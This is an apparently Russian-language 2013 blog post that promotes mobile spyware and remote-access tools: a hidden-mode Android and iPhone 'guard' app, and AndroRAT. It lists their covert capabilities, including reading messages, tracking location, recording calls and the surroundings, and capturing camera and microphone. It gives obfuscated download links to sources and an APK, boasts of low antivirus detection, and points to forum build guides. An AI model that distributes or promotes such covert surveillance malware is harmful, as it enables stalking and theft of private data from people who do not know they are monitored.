суббота, 20 июля 2013 г.

M0bile Malware

Итак дорогие дамы и господа, представляю на Ваше обозрение статью/манул/навождение M0bile Malware.
Статья создана при поддержки фонда "фонд КРЕБС&МУСОРА И КАРОФЕЛЕ-КОПАТЕЛИ".

И разумеется всё как всегда без воды.
Немного предыстории,  был выложен софт - guard/rat (понимайте как хотите)



Примерный функционал (тут тупо копипаста):

  Cофт изначально предназначался как защищалка ведроидная/guard, работает в hide (!) режиме, за исключением старта (для чего, ниже сурсы и приведены), никаких иконок, и прочёй ёбани.

Что может софт:

списку входящих/исходящий звонков

списку входящих/исходящих сообщений

местоположения пользователя (основано на данных gps и мобильных сетей)

истории и закладкам браузера

событиям календаря

списку контактов в контактной книжке

- мониторинг сообщений Skype (для рутованных устройств)

- мониторинг сообщений Whatsapp(для рутованных устройств)

- мониторинг сообщений Viber (для рутованных устройств)

- просмотр фотографий, хранящихся на устройстве

- запись звонков (доступно с версии 0.3.0)

- запись окружения (доступно с версии 0.3.0)


Если что то не устраивает, вид, сурсы, софт, чтение...
Просьба всяким мега-тру кококок хацкерам с дальняка, кукарекать, и читать там где нравится xs24_4pda.ru/forum/index.php?showtopic=466620
На последний момент чека (пару дней назад) было 1/45 (привет дяде Жени)
1ый вариант, распакованный из под венды (мне, не очень нравится) , ведроид студией
2ый вариант, распакованный из под *nix (норм), apktool, and smali.
Оба варианты, точно собираются в ведро студии, по поводу никсов, думаю проблем не возникнет.


X4424SD_+www.multiupload.nl/PRDOV0X5NB[/url]
Сам *.apk можно взять отсюда, _XR2DS+gr1m.com



Этот же вариант, только под iPhone. Да, спасибо умники, я в курсе что существует малварь под jailbreak"нутые фифоны. Здесь разница в стоимости и в халяве.
Работает вплоть до 6.1.4 , но в отличии от Ведроида, оставляет за собой иконку, которую можно спрятать скриптом/руками например вот так, x23232xfц_youtube.com/watch?v=QBVUefrue-Y
Манул по установке, отличается от ведра, и более подробный вариант находится здесь ___www.topspyapp.com/how-to-install/ios-instructions/;
как и Control Panel на которую отстукивают все данные, в отличии от AndroRAT (О нём ниже).


Софт также работает на платформе BlackBerry, но ни фонд, ни усатые копатели, ни мусора денег/устройств не выдали для тестов. Поэтому ебитесь как хотите Широкая улыбка
Автор сего "guardin'а/зверька" русский, сконтактировав с ним , не пришлось ничего крабить, легко внушаемый (энтузиасты-стартаперы видать), короч переманить не тяжко.


 



Теперь по поводу AndroRAT.
Автор француз, недавно достигший совершеннолетия, как только понял что он создал, сразу же убил проект на гитхабе:

 

xcd2e_github.com/RobinDavid/androrat

Или же перепрятал?

xsd333_github.com/wcb972/androrat

Что может софт:

AndroRat - это RAT для смартфонов на Android.

Получить список контактов и всю информацию о них;

Получить журналы вызовов;

Получить все сообщения;

Получить текущее местоположение по GPS;

Мониторинг входящих сообщений в реальном времени;

Мониторинг состояния телефона в реальном времени (входящие звонки, пропущенные звонки и т.д.);

Захват изображения с камеры;

Стриминг звука с микрофона (или с другого источника);

Стриминг видео с камеры;

Отправить СМС-сообщение;

Сделать вызов;

Открыть URL в стандартном браузере;

Заставить телефон завибрировать.

Подробнее здесь:


xw333_youtube.com/watch?v=dTV5Go3wRyw

Манул по сборке:


x33ds__www.hackforums.net/showthread.php?tid=3185186


Если кому то удастся всё же скомпилить эту хрень, дайте знать плз. Ибо я пол дня проебался с этой ёбанью, нихуя дельного не вышло - Java хуле.

Комментариев нет:

Отправить комментарий